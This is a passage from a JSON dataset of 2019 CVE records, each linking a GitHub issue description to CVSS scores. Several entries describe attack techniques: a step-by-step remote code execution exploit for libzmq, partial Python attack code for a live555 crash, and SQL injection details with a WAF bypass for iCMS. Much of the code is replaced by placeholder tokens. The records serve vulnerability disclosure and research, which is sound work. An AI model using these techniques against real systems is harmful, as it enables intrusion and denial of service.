  43000. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43001. "severity": "HIGH",
  43002. "baseScore": 7.5,
  43003. "impactScore": 3.6,
  43004. "exploitabilityScore": 3.9
  43005. },
  43006. {
  43007. "CVE_ID": "CVE-2019-6136",
  43008. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/105",
  43009. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/105",
  43010. "Repo_new": "mz-automation/libiec61850",
  43011. "Issue_Created_At": "2019-01-11T12:36:38Z",
  43012. "description": "Memory leak in sv_subscriber.c. Hi team, Their are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
  43013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43014. "severity": "HIGH",
  43015. "baseScore": 7.5,
  43016. "impactScore": 3.6,
  43017. "exploitabilityScore": 3.9
  43018. },
  43019. {
  43020. "CVE_ID": "CVE-2019-6137",
  43021. "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/39",
  43022. "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/39",
  43023. "Repo_new": "mz-automation/lib60870",
  43024. "Issue_Created_At": "2019-01-11T12:49:26Z",
  43025. "description": "Memory leak in link_layer.c. Hi team, There is a memory leak in APITAG Snip FILETAG APITAG Memory leak ERRORTAG",
  43026. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43027. "severity": "HIGH",
  43028. "baseScore": 7.5,
  43029. "impactScore": 3.6,
  43030. "exploitabilityScore": 3.9
  43031. },
  43032. {
  43033. "CVE_ID": "CVE-2019-6245",
  43034. "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/70",
  43035. "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/70",
  43036. "Repo_new": "svgpp/svgpp",
  43037. "Issue_Created_At": "2019-01-12T11:41:38Z",
  43038. "description": "4 bugs found in svgpp. bug1: an oob read bug description A type confusion bug lead to out of bound read in PATHTAG APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride. This bug may be used in info leak. poc URLTAG asan URLTAG details The crash happened in PATHTAG URLTAG Looks like type confusion. APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride This is a out of bound read bug. bug2: a heap buffer overflow bug description An heap buffer overflow bug in svgpp_agg_render which may lead to code excution. In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. poc URLTAG asan URLTAG details here is a heap overflow here, the specific function call process is as follows: APITAG > APITAG Multiple calls in a loop > APITAG > APITAG In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. URLTAG In the render_scanlines_aa_solid function, there is no explicit restriction on the 'for' loop. After calling blend_hline multiple times, it causes a heap overflow. This bug is also found in agg_pixfmt_rgb.h, agg_pixfmt_rgb_packed.h, agg_pixfmt_rgba.h, agg_pixfmt_transposer.h. bug3: a stack overflow bug description in the function agg::cell_aa::not_equal, dx is assigned to NUMBERTAG if dx >= dx_limit, which is NUMBERTAG APITAG = dx_limit, which is NUMBERTAG poly_subpixel_shift). This function will call itself recursively. There will be a sitaution when NUMBERTAG always bigger than dx_limit during the recursion Thats how the stack overflow happened. bug4: a oob read bug description After callng gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access. This may lead to an out of bound read. poc URLTAG asan URLTAG details CODETAG After callng gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access.",
  43039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43040. "severity": "HIGH",
  43041. "baseScore": 8.8,
  43042. "impactScore": 5.9,
  43043. "exploitabilityScore": 2.8
  43044. },
  43045. {
  43046. "CVE_ID": "CVE-2019-6250",
  43047. "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3351",
  43048. "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3351",
  43049. "Repo_new": "zeromq/libzmq",
  43050. "Issue_Created_At": "2019-01-08T14:15:33Z",
  43051. "description": "Remote code execution vulnerability. Bug details In APITAG , the attacker can provide an APITAG of his choosing: ERRORTAG Then, in APITAG , a comparison is performed to check if this peer supplied APITAG is within the bounds of the currently allocated block of memory: ERRORTAG This is inadequate because a very large APITAG will overflow the pointer ( APITAG ). In other words, the comparison will compute as 'false' even though APITAG bytes don't fit in the currently allocated block. Exploit details Now that APITAG has been set to a very high value, the attacker is allowed to send this amount of bytes, and libzmq will copy it to its internal buffer without any further checks. This means that it's possible to write beyond the bounds of the allocated space. However, for the exploit this is not necessary to corrupt memory beyond the buffer proper. As it turns out, the space the attacker is writing to is immediately followed by a APITAG block: ERRORTAG So the memory layout is such that the receive buffer is immediately followed by data , then size , then ffn , then hint , then refcnt . Note that the receive buffer + the APITAG is a single, solid block of memory; by overwriting beyond the designated receive buffer's bounds, no dlmalloc state variables in memory (like bk , fd ) are corrupted (or, in other words, it wouldn't trigger APITAG This means that the attacker can overwrite all these members with arbitrary values. ffn is a function pointer, that upon connection closure, is called with two parameters, data and hint . This means the attacker can call an arbitrary function/address with two arbitrary parameters. In my exploit, I set ffn to the address of strcpy , set the first parameter to somewhere in the executable's .data section, and the second parameter to the address of the character I want to write followed by a NULL character. So for instance, if i want to write a 'g' character, I search the binary for an occurrence of 'g NUMBERTAG and use this address as the second value to my strcpy call. For each character of the command I want to execute on the remote machine, I make a separate request to write that character to the .data section. So if I want to execute 'gnome calculator', I first write a 'g', then a 'n', then an 'o', and so on, until the full 'gnome calculator' string is written to .data. In the next request, I overwrite the 'data' member of APITAG with the address of the .data section (where now APITAG resides), set the ffn member to the system libc function, and hint to NULL. In effect, this calls APITAG , by which this command is executed on the remote machine. Exploit The following is a self exploit, that demonstrates the exploit flow as explained above. ERRORTAG Notes Crucial to this exploit is knowing certain addresses, like strcpy and system , though the address of strcpy could be replaced with any executable location that contains APITAG or anything else that moves APITAG to APITAG , and system might be replaced with code that executes the string at rsi . I did not find any other vulnerabilities in libzmq, but if there is any information leaking vulnerability in libzmq, or the application that uses it, that would allow the attacker to calculate proper code offsets, this would defeat ASLR. Resolution Resolution of this vulnerability must consist of preventing pointer arithmetic overflow in APITAG .",
  43052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  43053. "severity": "HIGH",
  43054. "baseScore": 8.8,
  43055. "impactScore": 5.9,
  43056. "exploitabilityScore": 2.8
  43057. },
  43058. {
  43059. "CVE_ID": "CVE-2019-6256",
  43060. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/19",
  43061. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/19",
  43062. "Repo_new": "rgaufman/live555",
  43063. "Issue_Created_At": "2019-01-14T02:37:30Z",
  43064. "description": "There is a Denial of service attack issue that can cause program to crash in LIVE NUMBERTAG Media Server version NUMBERTAG ISSUE DESCRIPTION ================= The project website : URLTAG I found a new way to make APITAG crash in lastest version NUMBERTAG when RTSP over HTTP tunneling is supported. I only need to send two HTTP requests in one TCP connection. The problem occurrs in APITAG , it calls APITAG If I send a HTTP GET packet with a specific APITAG firstly, then I send a HTTP POST packet with this APITAG in the same TCP connection. APITAG will call a error virtual function pointer in APITAG APITAG and the pointer value comes from heap which may control. Attack APITAG python code\uff1a from socket import target_ip = REMOTE_SERVER_IP target_port NUMBERTAG or NUMBERTAG tcp = socket(AF_INET,SOCK_STREAM) APITAG http_request_GET = '''GET / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text ''' http_request_POST = '''POST / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text This is test data ''' APITAG data = APITAG APITAG data = APITAG APITAG You can just build a test demo according to URLTAG and attack the bin APITAG for verification. IMPACT ====== It will cause dos attack and potential remote command execution in version NUMBERTAG I verified) , even all earlier versions APITAG is just my unverified guess).",
  43065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43066. "severity": "CRITICAL",
  43067. "baseScore": 9.8,
  43068. "impactScore": 5.9,
  43069. "exploitabilityScore": 3.9
  43070. },
  43071. {
  43072. "CVE_ID": "CVE-2019-6259",
  43073. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/47",
  43074. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/47",
  43075. "Repo_new": "idreamsoft/iCMS",
  43076. "Issue_Created_At": "2019-01-10T08:16:20Z",
  43077. "description": "iCMS NUMBERTAG Has A SQLi vulnerability in FILETAG . The vulnerability is in background APITAG In line NUMBERTAG in this code ,we can contol APITAG if($_POST['_data_id']){ $_data_id = APITAG $_data_id = json_decode($_data_id,true); $_count = count($_data_id); } We can post data and due to APITAG ,we alse can post a ' successfully. In line NUMBERTAG if(is_array($_data_id)){ $dkey = array_search($adid, $_data_id); if($dkey!==false && $_chapter){//\u64a4\u6d88\u7ae0\u8282\u65f6 unset($_data_id[$dkey]); //\u5220\u9664\u7ae0\u8282 if($_data_id)foreach ($_data_id as $_id) { $_id && article::del_data($_id,'id'); } } } If APITAG is a arary , APITAG , APITAG has a value that we can send APITAG to APITAG In FILETAG public static function del_data($id,$f='aid'){ iDB::query(\"DELETE FROM APITAG WHERE APITAG ='$id'\"); } And the ERRORTAG used in ERRORTAG in line NUMBERTAG APITAG we can find that APITAG ,we don't know the APITAG ,but we can post a many data to bypass this ,like APITAG And the APITAG , APITAG ,we can send chapter NUMBERTAG to bypass. so that the final payload is CODETAG And another very very very very very import problem is that in FILETAG , APITAG but in APITAG use APITAG ,but this place use APITAG of course return ture ,that mean this WAF in background is no any use!!!!!!!!!!!!so that I can use sleep NUMBERTAG and continue injecting. author by leo. EMAILTAG .cn",
  43078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43079. "severity": "CRITICAL",
  43080. "baseScore": 9.8,
  43081. "impactScore": 5.9,
  43082. "exploitabilityScore": 3.9
  43083. },
  43084. {
  43085. "CVE_ID": "CVE-2019-6284",
  43086. "Issue_Url_old": "https://github.com/sass/libsass/issues/2816",
  43087. "Issue_Url_new": "https://github.com/sass/libsass/issues/2816",
  43088. "Repo_new": "sass/libsass",
  43089. "Issue_Created_At": "2019-01-14T06:46:57Z",
  43090. "description": "APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ). A heap buffer overflow in APITAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG ef bp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG ee in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in APITAG const ) PATHTAG NUMBERTAG ce2 in char const APITAG const ) PATHTAG NUMBERTAG ce2 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG d NUMBERTAG e in APITAG PATHTAG NUMBERTAG bc1b in APITAG PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b3e in APITAG PATHTAG NUMBERTAG d9b in APITAG PATHTAG NUMBERTAG fa3d2 in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG f8c3b in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Shadow bytes around the buggy address NUMBERTAG c0e7fff7fb NUMBERTAG c0e7fff7fc NUMBERTAG c0e7fff7fd NUMBERTAG c0e7fff7fe NUMBERTAG c0e7fff7ff NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  43091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43092. "severity": "MEDIUM",
  43093. "baseScore": 6.5,
  43094. "impactScore": 3.6,
  43095. "exploitabilityScore": 2.8
  43096. },
  43097. {
  43098. "CVE_ID": "CVE-2019-6285",
  43099. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/660",
  43100. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/660",
  43101. "Repo_new": "jbeder/yaml-cpp",
  43102. "Issue_Created_At": "2019-01-14T07:58:28Z",
  43103. "description": "Stack Overflow in APITAG (). Stack Overflow in APITAG () position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG bf6a8fc0 (pc NUMBERTAG e3e3 bp NUMBERTAG bf6a NUMBERTAG e8 sp NUMBERTAG bf6a8fb0 T NUMBERTAG e3e2 ( PATHTAG NUMBERTAG fde8 ( PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG b8 ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
  43104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43105. "severity": "MEDIUM",
  43106. "baseScore": 6.5,
  43107. "impactScore": 3.6,
  43108. "exploitabilityScore": 2.8
  43109. },
  43110. {
  43111. "CVE_ID": "CVE-2019-6286",
  43112. "Issue_Url_old": "https://github.com/sass/libsass/issues/2815",
  43113. "Issue_Url_new": "https://github.com/sass/libsass/issues/2815",
  43114. "Repo_new": "sass/libsass",
  43115. "Issue_Created_At": "2019-01-14T06:39:46Z",
  43116. "description": "APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ). A heap buffer overflow in APITAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: APITAG \u3001 APITAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ba at pc NUMBERTAG bp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG sp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ba thread T NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ba is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  43117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43118. "severity": "MEDIUM",
  43119. "baseScore": 6.5,
  43120. "impactScore": 3.6,
  43121. "exploitabilityScore": 2.8
  43122. },
  43123. {
  43124. "CVE_ID": "CVE-2019-6293",
  43125. "Issue_Url_old": "https://github.com/westes/flex/issues/414",
  43126. "Issue_Url_new": "https://github.com/westes/flex/issues/414",
  43127. "Repo_new": "westes/flex",
  43128. "Issue_Created_At": "2019-01-09T07:06:10Z",
  43129. "description": "Stack Comsumption Problem Caused By the mark_beginning_as_normal Function Making Recursive Calls to Itself. Hi there, An issue was discovered in function mark_beginning_as_normal in nfa.c, as distributed in fle NUMBERTAG There is a stack exhaustion problem caused by the in mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of ' ' characters. Here is the POC file. Please use the \u201c./flex $POC\u201d to reproduce the bug. APITAG $POC\u201d The ASAN dumps the stack trace as follows: ERRORTAG",
  43130. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43131. "severity": "MEDIUM",
  43132. "baseScore": 5.5,
  43133. "impactScore": 3.6,
  43134. "exploitabilityScore": 1.8
  43135. },
  43136. {
  43137. "CVE_ID": "CVE-2019-6294",
  43138. "Issue_Url_old": "https://github.com/TeamEasy/EasyCMS/issues/8",
  43139. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/8",
  43140. "Repo_new": "teameasy/easycms",
  43141. "Issue_Created_At": "2019-01-15T09:48:11Z",
  43142. "description": "There is one CSRF vulnerability that can add the user account . After the administrator logged in, open the following page poc\uff1a APITAG add a user ''' APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG '''",
  43143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43144. "severity": "HIGH",
  43145. "baseScore": 8.8,
  43146. "impactScore": 5.9,
  43147. "exploitabilityScore": 2.8
  43148. },
  43149. {
  43150. "CVE_ID": "CVE-2019-6295",
  43151. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/12",
  43152. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/12",
  43153. "Repo_new": "yanchongchong/swallow",
  43154. "Issue_Created_At": "2019-01-15T08:21:23Z",
  43155. "description": "1. ERRORTAG",
  43156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43157. "severity": "CRITICAL",
  43158. "baseScore": 9.8,
  43159. "impactScore": 5.9,
  43160. "exploitabilityScore": 3.9
  43161. },
  43162. {
  43163. "CVE_ID": "CVE-2019-6446",
  43164. "Issue_Url_old": "https://github.com/numpy/numpy/issues/12759",
  43165. "Issue_Url_new": "https://github.com/numpy/numpy/issues/12759",
  43166. "Repo_new": "numpy/numpy",
  43167. "Issue_Created_At": "2019-01-16T02:36:51Z",
  43168. "description": "numpy load function with evil data will cause command execution. numpy load function with evil data will cause command execution,if attack share evil data on internet, when user load it , it will cause command execution. Reproducing code example: CODETAG APITAG version information NUMBERTAG",
  43169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43170. "severity": "CRITICAL",
  43171. "baseScore": 9.8,
  43172. "impactScore": 5.9,
  43173. "exploitabilityScore": 3.9
  43174. },
  43175. {
  43176. "CVE_ID": "CVE-2019-6486",
  43177. "Issue_Url_old": "https://github.com/golang/go/issues/29903",
  43178. "Issue_Url_new": "https://github.com/golang/go/issues/29903",
  43179. "Repo_new": "golang/go",
  43180. "Issue_Created_At": "2019-01-23T21:47:29Z",
  43181. "description": "crypto/elliptic: CPU APITAG vulnerability affecting P NUMBERTAG and P NUMBERTAG A APITAG vulnerability in the crypto/elliptic implementations of the P NUMBERTAG and P NUMBERTAG elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU. These inputs might be delivered via TLS handshakes NUMBERTAG certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH private key is reused more than once, the attack can also lead to key recovery. This issue is CVETAG .",
  43182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  43183. "severity": "HIGH",
  43184. "baseScore": 8.2,
  43185. "impactScore": 4.2,
  43186. "exploitabilityScore": 3.9
  43187. },
  43188. {
  43189. "CVE_ID": "CVE-2019-6497",
  43190. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/1",
  43191. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/1",
  43192. "Repo_new": "fantasticlbp/hotels_server",
  43193. "Issue_Created_At": "2019-01-19T15:20:53Z",
  43194. "description": "SQL Injection Vulnerability in FILETAG . In FILETAG FILETAG the parameter was added with a string \"username=\" ,passed to function find In the definition of function find,we can notice that though the author use PDO, he didn't use Prepared technique to avoid SQL injection vulnerability. What a pity! FILETAG After analyzing these codes,we can simply use sqlmap to exploit the vulnerability and have fun! FILETAG",
